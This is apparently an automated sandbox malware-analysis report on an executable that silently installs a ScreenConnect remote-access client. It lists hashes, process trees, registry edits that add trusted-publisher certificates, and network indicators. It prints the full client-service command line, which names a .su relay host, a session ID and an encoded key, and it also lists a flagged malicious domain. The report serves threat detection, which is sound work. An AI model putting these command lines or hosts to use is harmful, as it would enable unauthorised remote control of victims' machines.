File name:

SSA_67febb55ab865.exe

Full analysis: https://app.any.run/tasks/268c504d-cb53-4a18-b605-99d100e1c3ca
Verdict: Malicious activity
Analysis date: April 15, 2025, 20:04:23
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
screenconnect
rmm-tool
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

AE20C0146014433C8278E1552B9AFACC

SHA1:

D6A07FCDAAB9BC7B8A9DFFC0D3CA7693F3A11301

SHA256:

515FD3167F7EE355D819BFE0EB03ED04FBD1CAD1A469482200431279C51A857E

SSDEEP:

1536:lejLH3MVw8licIgWQog5Mzg+MoCdqQsWQcd69jPVfq7NKES:8jLHcVw8licpWQog5Ms+f+l6xPVfqnS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 8152)
  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • SSA_67febb55ab865.exe (PID: 5956)
      • dfsvc.exe (PID: 6028)
    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8112)
      • ScreenConnect.ClientService.exe (PID: 8152)
      • ScreenConnect.WindowsClient.exe (PID: 6872)
      • ScreenConnect.WindowsClient.exe (PID: 4008)
    • Connects to unusual port

      • dfsvc.exe (PID: 6028)
    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 6028)
    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 6028)
    • Reads the date of Windows installation

      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
    • SCREENCONNECT mutex has been found

      • ScreenConnect.ClientService.exe (PID: 8152)
    • Executes as Windows Service

      • ScreenConnect.ClientService.exe (PID: 8152)
    • Creates or modifies Windows services

      • ScreenConnect.ClientService.exe (PID: 8152)
    • Potential Corporate Privacy Violation

      • ScreenConnect.ClientService.exe (PID: 8152)
    • Screenconnect has been detected

      • ScreenConnect.ClientService.exe (PID: 8152)
  • INFO

    • Checks supported languages

      • SSA_67febb55ab865.exe (PID: 5956)
      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8112)
      • ScreenConnect.ClientService.exe (PID: 8152)
      • ScreenConnect.WindowsClient.exe (PID: 6872)
      • ScreenConnect.WindowsClient.exe (PID: 4008)
    • Reads the computer name

      • SSA_67febb55ab865.exe (PID: 5956)
      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8112)
      • ScreenConnect.ClientService.exe (PID: 8152)
      • ScreenConnect.WindowsClient.exe (PID: 6872)
      • ScreenConnect.WindowsClient.exe (PID: 4008)
    • Reads the machine GUID from the registry

      • SSA_67febb55ab865.exe (PID: 5956)
      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8112)
      • ScreenConnect.ClientService.exe (PID: 8152)
      • ScreenConnect.WindowsClient.exe (PID: 6872)
      • ScreenConnect.WindowsClient.exe (PID: 4008)
    • Reads Environment values

      • dfsvc.exe (PID: 6028)
    • Disables trace logs

      • dfsvc.exe (PID: 6028)
    • Checks proxy server information

      • dfsvc.exe (PID: 6028)
    • Reads the software policy settings

      • dfsvc.exe (PID: 6028)
    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 6028)
    • Create files in a temporary directory

      • dfsvc.exe (PID: 6028)
    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8152)
    • Process checks computer location settings

      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
    • SCREENCONNECT has been detected

      • ScreenConnect.ClientService.exe (PID: 8152)
    • Reads CPU info

      • ScreenConnect.WindowsClient.exe (PID: 4008)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:11:18 19:55:37+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.33
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x14ba
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes: 137
Monitored processes: 9
Malicious processes: 2
Suspicious processes: 1

Behavior graph

start
  • ssa_67febb55ab865.exe (no specs)
  • dfsvc.exe
  • sppextcomobj.exe (no specs)
  • slui.exe (no specs)
  • screenconnect.windowsclient.exe (no specs)
  • screenconnect.clientservice.exe #SCREENCONNECT
  • screenconnect.clientservice.exe
  • screenconnect.windowsclient.exe (no specs)
  • screenconnect.windowsclient.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 4008
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exe" "RunRole" "fcaaf15c-f226-4602-bfd1-e0d74c7f517c" "System"
Path: C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exe
Parent process: ScreenConnect.ClientService.exe
User:
SYSTEM
Company:
ScreenConnect Software
Integrity Level:
SYSTEM
Description:
Exit code:
0
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\evopr83b.d2b\ntecavn6.mpy\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID: 5956
CMD: "C:\Users\admin\AppData\Local\Temp\SSA_67febb55ab865.exe"
Path: C:\Users\admin\AppData\Local\Temp\SSA_67febb55ab865.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\admin\appdata\local\temp\ssa_67febb55ab865.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
PID: 6028
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Parent process: SSA_67febb55ab865.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ClickOnce
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 6872
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exe" "RunRole" "c63bcf29-7882-4cca-9fc2-901167e3d9be" "User"
Path: C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exe
Parent process: ScreenConnect.ClientService.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\evopr83b.d2b\ntecavn6.mpy\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID: 7288
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
PID: 7320
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 8008
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exe"
Path: C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exe
Parent process: dfsvc.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\evopr83b.d2b\ntecavn6.mpy\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 8112
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.ClientService.exe" "?y=Guest&h=info.seac0cruree-den0ee-reei9-90.su&p=443&s=ea4b1fc8-dbce-4754-a66a-799b33ee0e44&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Untitled%20Session" "5"
Path: C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.ClientService.exe
Parent process: ScreenConnect.WindowsClient.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\evopr83b.d2b\ntecavn6.mpy\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
PID: 8152
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.ClientService.exe" "?y=Guest&h=info.seac0cruree-den0ee-reei9-90.su&p=443&s=ea4b1fc8-dbce-4754-a66a-799b33ee0e44&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Untitled%20Session" "5"
Path: C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.ClientService.exe
Parent process: services.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\evopr83b.d2b\ntecavn6.mpy\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\msvcrt.dll
Total events: 8 861
Read events: 8 668
Write events: 161
Delete events: 32

Modification events

(PID) Process: (5956) SSA_67febb55ab865.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation: delete value
Name: 7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:

(PID) Process: (5956) SSA_67febb55ab865.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation: write
Name: Blob
Value:
(PID) Process: (5956) SSA_67febb55ab865.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation: delete value
Name: 4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:

(PID) Process: (5956) SSA_67febb55ab865.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation: write
Name: Blob
Value:
(PID) Process: (6028) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: write
Name: ComponentStore_RandomString
Value: VW7JMXVRZ9JAAGECNBYACZND

(PID) Process: (6028) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: delete value
Name: ComponentStore_RandomString
Value: VW7JMXVRZ9JAAGECNBYACZND

(PID) Process: (6028) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: delete key
Name: (default)
Value:

(PID) Process: (6028) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: write
Name: ComponentStore_RandomString
Value: EVOPR83BD2BNTECAVN6MPYQ5

(PID) Process: (6028) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation: write
Name: StateStore_RandomString
Value: 1NJN3V7ZX2ZO9XE360PTB70Y

(PID) Process: (6028) dfsvc.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0
Executable files: 14
Suspicious files: 19
Text files: 24
Unknown types: 0

Dropped files

PID: 6028
Process: dfsvc.exe
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\8XOQN5M7.M4M\5PJHM7WB.BYR\ScreenConnect.WindowsClient.exe.manifest
Type: xml
MD5: 9165412EE08839B9702BD4971864A133
SHA256: 6BB1C1AA5663AD33EDA2256037DA8E7439502C206D4C0047270A2FD1F006BB50

PID: 6028
Process: dfsvc.exe
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\NRZDH2BX.8QZ\67NYHD60.GR9.application
Type: xml
MD5: A51027818F34FC5ACA94AF3975E82112
SHA256: 9BA8267A16A16228FF01A9B3AA5648B1EF4D8A99326DFCDCBEB3D20BFDC7E958

PID: 6028
Process: dfsvc.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792
Type: binary
MD5: D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256: 8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050

PID: 6028
Process: dfsvc.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Type: binary
MD5: 647EB8E6BB9D301826AE08454A55C514
SHA256: D1EDCF6F0D2D5227A6EB512530B50DBAEB7E0B8CFBD00DA0DAD47E35DA0BF91C

PID: 6028
Process: dfsvc.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B
Type: binary
MD5: BBE3662B8B338817769386FFBFC49DA5
SHA256: D0095458FE8A94608B9E6587F5F7B50F603F1743C6DED3FE5E1D3CB66373CB32

PID: 6028
Process: dfsvc.exe
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\8XOQN5M7.M4M\5PJHM7WB.BYR\ScreenConnect.ClientService.exe
Type: executable
MD5: 256081D2D140ED2727C1957317627136
SHA256: 72B206D8C2EA0378F096C5E7C13022F67A0A0F670A10C1534B6F7A1BA95E8BE6

PID: 6028
Process: dfsvc.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Type: binary
MD5: 4312835B9B682C3148B57E073EDAD193
SHA256: 68CD377C79D3ECA658BB7514F3A2BC6CC0ABA1A6DC0503C7C25E6261430237E1

PID: 6028
Process: dfsvc.exe
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\8XOQN5M7.M4M\5PJHM7WB.BYR\ScreenConnect.WindowsBackstageShell.exe
Type: executable
MD5: DD9D8572AC8B91F6844E9E8A28684577
SHA256: A2409879344F21A45175A17F857B4C027087200F4892810994715A189F2A6280

PID: 6028
Process: dfsvc.exe
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\8XOQN5M7.M4M\5PJHM7WB.BYR\ScreenConnect.WindowsClient.exe.config
Type: xml
MD5: 728175E20FFBCEB46760BB5E1112F38B
SHA256: 87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077

PID: 6028
Process: dfsvc.exe
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\8XOQN5M7.M4M\5PJHM7WB.BYR\ScreenConnect.Windows.dll
Type: executable
MD5: 254D64388C6C52228D7A921960A03F6B
SHA256: 05E78416A344F74095E36FF14BAA719867E9E163E1AE9A96C29DF8615748B0AE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 22
DNS requests: 12
Threats: 1

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | GET | 200 | 23.48.23.145:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
6028 | dfsvc.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D | unknown | - | - | whitelisted
6028 | dfsvc.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D | unknown | - | - | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | - | - | whitelisted
6028 | dfsvc.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D | unknown | - | - | whitelisted
7892 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | - | - | whitelisted
7892 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | - | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 40.127.240.158:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
2104 | svchost.exe | 40.127.240.158:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
- | - | 23.48.23.145:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
6028 | dfsvc.exe | 104.21.80.1:8443 | texz.jhpublicaffairs.ie | CLOUDFLARENET | - | unknown
6028 | dfsvc.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted
6544 | svchost.exe | 20.190.159.0:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.145
  • 23.48.23.148
  • 23.48.23.155
  • 23.48.23.146
  • 23.48.23.139
  • 23.48.23.140
  • 23.48.23.157
  • 23.48.23.147
  • 23.48.23.149
whitelisted
google.com
  • 142.250.185.174
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
texz.jhpublicaffairs.ie
  • 104.21.80.1
  • 104.21.16.1
  • 104.21.32.1
  • 104.21.112.1
  • 104.21.48.1
  • 104.21.64.1
  • 104.21.96.1
malicious
ocsp.digicert.com
  • 2.17.190.73
whitelisted
login.live.com
  • 20.190.159.0
  • 40.126.31.0
  • 40.126.31.129
  • 40.126.31.1
  • 20.190.159.128
  • 20.190.159.73
  • 40.126.31.2
  • 20.190.159.2
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.69.42.241
whitelisted
info.seac0cruree-den0ee-reei9-90.su
  • 45.133.74.85
unknown

Threats

PID | Process | Class | Message
- | - | Potential Corporate Privacy Violation | REMOTE [ANY.RUN] ScreenConnect Server Response
No debug info